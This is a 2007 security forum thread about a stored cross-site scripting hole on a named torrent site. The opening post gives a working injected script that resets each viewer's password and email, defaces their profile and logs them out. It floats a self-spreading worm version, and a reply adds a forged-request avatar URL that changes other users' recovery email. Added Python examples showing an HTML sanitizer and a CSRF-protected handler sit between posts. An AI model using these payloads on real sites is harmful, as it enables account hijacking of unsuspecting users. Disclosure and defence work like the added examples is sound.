Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
XPSS - fallen empornium
Posted by: Anonymous User
Date: January 19, 2007 03:34PM

Hi!

XPSS? Cross Porn Site Scripting! Any of you guys know the empornium? Sazaraki's old place? I took some checks on that site and found interesting stuff. The facts:

Users: 1,001,188 (time of post)
Torrents: 31,732 (just the good stuff)

Anyone can create an account - no invitations or restrictions. Users can upload torrents and stuff and share tons of porn day by day.

Good news 'til now. The bad news is, users with a certain rank can post torrent descriptions with html content. unfiltered html. anything. globally persistent XPSS (one can buy such a rank for 5$ or by having 100GB uploaded) ;)
I played around a little and tried out what would be possible. After some hours of work I had a fully working wannabe-worm. A little script snippet which can be posted in the above mentioned torrent description. Source will follow later...

Once executed the script by now does not do very much - it just loads jQuery (I am lazy) and creates an AJAX request to the 'profileedit.php' with some parameters like image links to weird stallowned pictures and a new password. A new password!
So posting a torrent where 1.000 ppl would click on would definitely kick any of those clickers (except the noscript dudes) off this portal forever. Password change combined with a logout CSRF of the profile page rocks...

Ok - the sources for this scenario are written and tested (on my own profile with a superold torrent of mine - youth...) and they work. After that I thought about making a request to the mytorrents page (xhr), filtering out the torrent ids (7 digit number) and sending requests to change the torrent info(s) of the logged in user and inject the malicious code to spread the word. But I didn't code that - would be beyond proving the concept.

So I registered at their bb and wrote a post about the issue in short form like "vulnerability, xss worm, high danger, no commercial interest, offer fixing help" etc. I am such a good boy.

First answer was dumbass, second the admins would take best care of the portal and it could just be a false alert from my desktop firewall. Yeah. My desktop firewall - I was so naive... Some hours later the thread was deleted by a mod or an admin. No PMs, no email, nothing. I don't wanna sound frustrated but I am feeling a mixture of amusement and lack of understanding.

Well, here we go for the sources- inject this in your torrent and you have the above mentioned effect.

<script type="text/javascript" src="http://jquery.com/src/jquery-latest.pack.js"></script>
<script type="text/javascript">

$(document).ready(function(){

    $.ajax({
        type: "POST",
        url: "http://empornium.us/takeprofedit.php",
        data: "acceptpms=no&pmnotif=no&avatar=http://img150.imageshack.us/img150/3060/stallowned5wk.jpg&info=<img src='http://empornium.us/logout.php'><img src='http://www.hfstival.com/gallery/albums/userpics/13764/stallowned.jpg' style='position:absolute;top:0px;left:0px;'>&email=stall@owned.org&chpassword=123456&passagain=123456",
        success: function(msg){
            alert( "Loading Complete..." );
        }
    });

});

</script>


I don't know if it would be appropriate to run this thing in the wild - modified or not. But on the other hand a measure like changing the victim's profile to "you've been hacked, your new password is 123456 - PM the admin to fix this hole!" would open some eyes!?


What do you think?

Greetings,
.mario

p.s. some url stuff
http://empornium.us
http://forum.empornium.us

Re: XPSS - fallen empornium
Posted by: christ1an
Date: January 19, 2007 03:48PM

Well, this is pretty amusing to read but you have to agree that there are thousands of websites with these kinds of vulnerabilities. Hacking them is just an amusement with no further sense, isn't it?

Re: XPSS - fallen empornium
Posted by: Anonymous User
Date: January 19, 2007 03:59PM

I agree that there are thousands of sites with vulnerabilities but ignoring the existence of a severe vulnerability which should be fixed immediately is something else. Plus the hole can be fixed with ten lines of code at the right place. Plus 1.000.000 users - neopets vs. tits? 0:1!

Sometimes it's just painful to see a 1M community shortly before burning down due to pure ignorance of the admins.



Edited 1 time(s). Last edit at 01/19/2007 04:00PM by .mario.
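The "ten lines of code at the right place" fix .mario refers to, and the unfiltered-HTML description field from the opening post, as an added example that is not part of this thread and not TBsource's own code: an allowlist HTML filter for a torrent-description field. It is written in Python to show the logic (the site itself runs PHP); the permitted tags and attributes, the accepted URL schemes and the sample description are all assumptions constructed for the example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical allowlist for a torrent-description field: tag -> attributes permitted on it.
# Everything not listed (script, style, iframe, on* handlers, style=, ...) is dropped.
ALLOWED_TAGS = {
    "b": set(), "i": set(), "u": set(), "p": set(), "br": set(),
    "ul": set(), "ol": set(), "li": set(), "blockquote": set(),
    "a": {"href"}, "img": {"src", "alt"},
}
VOID_TAGS = {"br", "img"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}


def safe_url(value):
    """Accept only absolute http(s) URLs, so javascript:, data:, vbscript: etc. never survive."""
    parts = urlsplit(value.strip())
    return parts.scheme.lower() in SAFE_SCHEMES and bool(parts.netloc)


class AllowlistSanitizer(HTMLParser):
    """Re-serialises user HTML keeping only allowlisted tags/attributes; all text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.stack = []       # allowed tags currently open, so the output stays well nested
        self.dropping = 0     # >0 while inside <script>/<style>, whose text is discarded

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.dropping += 1
            return
        if tag not in ALLOWED_TAGS:
            return                      # unknown tag: drop the tag, keep its inner text
        kept = []
        for name, value in attrs:       # HTMLParser already lower-cases attribute names
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue                # drops onerror=, onclick=, style= and friends
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        if tag == "img" and not any(k.startswith(" src=") for k in kept):
            return                      # an <img> without an acceptable src is useless
        if tag == "a":
            kept.append(' rel="nofollow"')
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.dropping = max(0, self.dropping - 1)
            return
        if tag in self.stack:
            while self.stack:           # close down to the matching tag
                top = self.stack.pop()
                self.out.append("</%s>" % top)
                if top == tag:
                    break

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data, quote=False))
    # comments, doctypes and processing instructions hit HTMLParser's no-op handlers and vanish


def sanitize(fragment):
    """Return a safe HTML string for storage/display of a torrent description."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    while parser.stack:                 # close whatever the author left open
        parser.out.append("</%s>" % parser.stack.pop())
    return "".join(parser.out)


# Constructed sample description in the shape of the injection discussed in the thread.
SAMPLE = ('<b>Great rip</b> <script src="http://evil.example/x.js"></script>'
          '<img src="javascript:alert(1)" onerror="alert(1)">'
          '<a href="http://tracker.example/t?id=1" onclick="x()">link</a><i>unclosed')

if __name__ == "__main__":
    print(sanitize(SAMPLE))
```

Note what this filter does not do: an `<img>` whose src is an ordinary http URL on the site itself (the logout.php trick in the opening post) still passes, because to a sanitizer it is just an image. Output filtering stops the script from running in viewers' browsers; the state-changing endpoints still need their own protection against requests the user never meant to send.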

Re: XPSS - fallen empornium
Posted by: christ1an
Date: January 19, 2007 04:15PM

Yes, on this point you are perfectly right. I think these admins you mentioned simply don't have the slightest clue about what actually can be done through such vulnerabilities. They are not interested in the theme and don't care about it but try to administrate a more or less high traffic website. This is what comes out.

For people like you and me such behaviour is not comprehensible. You are right, painful to see but what can the majority do against this?

Re: XPSS - fallen empornium
Posted by: Anonymous User
Date: January 19, 2007 04:24PM

And it continues...

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/lsws/DEFAULT/html/doc.php on line 13

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /usr/local/lsws/DEFAULT/html/doc.php on line 16

Warning: Cannot modify header information - headers already sent by (output started at /usr/local/lsws/DEFAULT/html/doc.php:13) in /usr/local/lsws/DEFAULT/html/include/bittorrent.php on line 295

aha, lightspeed webserver, php 4.3.11 (via header info), mysql...

Re: XPSS - fallen empornium
Posted by: rsnake
Date: January 19, 2007 05:05PM

While I can't comment on your movie plot directly, WhiteAcid had an interesting idea the other day to build an information gathering worm. Think about the concept of a worm that would tell you everything you wanted to know about the users who visited something. It could gather tons of data that you wouldn't normally have access to. Not something I'd ever do, but interesting plot.

- RSnake
Gotta love it. http://ha.ckers.org

Re: XPSS - fallen empornium
Posted by: jungsonn
Date: January 20, 2007 02:03PM

Cool stuff, and nice that some are doing research on those worms; interested to see what you come up with based on this info. I do believe that the whole torrent system, including their trackers, is vulnerable in a certain way, and indeed pretty scary if it's global.

But your example - is this a real world thingy? Can't make that out from your story.

Re: XPSS - fallen empornium
Posted by: m1n3
Date: January 20, 2007 07:57PM

The site is based on TBsource which is a swiss cheese when it comes to XSS (at least the unpatched versions).
In older versions you could even set your avatar to
hxxp://example.com/takeprofedit.php?email=blabla@bla.bla
and it would change people's mail used to recover passwords :P
So that site probably got more dire issues than XSS ;)



Edited 1 time(s). Last edit at 01/20/2007 08:04PM by m1n3.
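The server-side counterpart to both problems in this thread (the avatar pointing at takeprofedit.php that m1n3 describes, and the XHR POST plus logout image in the opening post), as an added example that is neither from this thread nor from TBsource: a profile-edit handler that refuses state changes on GET, requires a per-session token for POST, and demands the current password before the email or password may change. It is Python standing in for the PHP handler; the Request class, field names, status codes and the sample user are all constructed for the example.

```python
import hashlib
import hmac
import secrets


class Request:
    """Constructed stand-in for what a PHP handler reads from $_SERVER, $_POST and $_SESSION."""

    def __init__(self, method, form, session, user):
        self.method = method      # "GET" or "POST"
        self.form = form          # submitted fields (dict)
        self.session = session    # server-side session store (dict)
        self.user = user          # logged-in user's record (dict); changes are written here


def hash_password(password, salt):
    """Salted PBKDF2 stand-in for the site's real password hashing."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()


def issue_csrf_token(session):
    """Create (once per session) the secret every state-changing form must echo back."""
    if "csrf" not in session:
        session["csrf"] = secrets.token_hex(32)
    return session["csrf"]


def profile_edit(req):
    """Return (status, message); only applies changes when every check passes."""
    # 1. Never change state on GET: an <img src=".../takeprofedit.php?email=..."> used as an
    #    avatar or in a description makes every viewer's browser issue exactly that GET.
    if req.method != "POST":
        return 405, "profile changes require POST"

    # 2. The form must echo the session's token. A request forged from another origin
    #    (an auto-submitted form, a cross-site XHR) cannot read it, so it fails here.
    expected = req.session.get("csrf", "")
    supplied = req.form.get("csrf", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"

    # 3. A script already running in the victim's origin can read the token, so credential
    #    changes additionally require the current password, which such a script does not have.
    wants_new_password = "chpassword" in req.form
    wants_new_email = "email" in req.form and req.form["email"] != req.user["email"]
    if wants_new_password or wants_new_email:
        current = hash_password(req.form.get("current_password", ""), req.user["salt"])
        if not hmac.compare_digest(current, req.user["pwhash"]):
            return 403, "current password required to change email or password"

    if wants_new_password:
        if req.form["chpassword"] != req.form.get("passagain"):
            return 400, "passwords do not match"
        req.user["pwhash"] = hash_password(req.form["chpassword"], req.user["salt"])
    if wants_new_email:
        req.user["email"] = req.form["email"]
    if "acceptpms" in req.form:            # harmless preference: token alone is enough
        req.user["acceptpms"] = req.form["acceptpms"] == "yes"
    return 200, "profile updated"


def make_user():
    """Constructed sample account with a known password."""
    salt = b"constructed-salt"
    return {"email": "mario@example.org", "salt": salt,
            "pwhash": hash_password("hunter2", salt), "acceptpms": True}


if __name__ == "__main__":
    session, user = {}, make_user()
    token = issue_csrf_token(session)
    print(profile_edit(Request("GET", {"email": "x@example.org"}, session, user)))
    print(profile_edit(Request("POST", {"csrf": token, "chpassword": "123456",
                                        "passagain": "123456"}, session, user)))
    print(profile_edit(Request("POST", {"csrf": token, "current_password": "hunter2",
                                        "chpassword": "longer-pass", "passagain": "longer-pass"},
                               session, user)))
```

The three checks are layered on purpose: the POST-only rule kills the image-GET variant, the token kills cross-origin forgery, and the current-password requirement limits what even a script running on the site itself can do to a logged-in account. The logout endpoint from the opening post should get the same POST-plus-token treatment, since a forced logout is a state change too.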

Re: XPSS - fallen empornium
Posted by: Anonymous User
Date: January 21, 2007 01:11PM

@jungsonn: no movie plot - real thing ;)

@m1n3: That avatar thing doesn't work anymore but the GXSS is bad enough - btw i discovered my thread in the empornium forum - they renamed and censored it but it is still there...

http://forums.empornium.us/viewtopic.php?t=75867

Re: XPSS - fallen empornium
Posted by: hackathology
Date: August 21, 2007 08:01AM

Hey RSnake, has that worm been developed by WhiteAcid already?

http://hackathology.blogspot.com

Re: XPSS - fallen empornium
Posted by: WhiteAcid
Date: August 21, 2007 08:38AM

Can't say I have, also I seem to have forgotten what brilliant idea I had :p
Perhaps if you search my posts from a few days before rsnake made that post you'll find something.

I did the search myself:
Fun Ideas for a MySpace Worm: http://sla.ckers.org/forum/read.php?3,5382,5385#msg-5385

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid (http://www.whiteacid.org) - your friendly, very lazy, web developer

Re: XPSS - fallen empornium
Posted by: hackathology
Date: August 24, 2007 10:19PM

thanks WhiteAcid

http://hackathology.blogspot.com
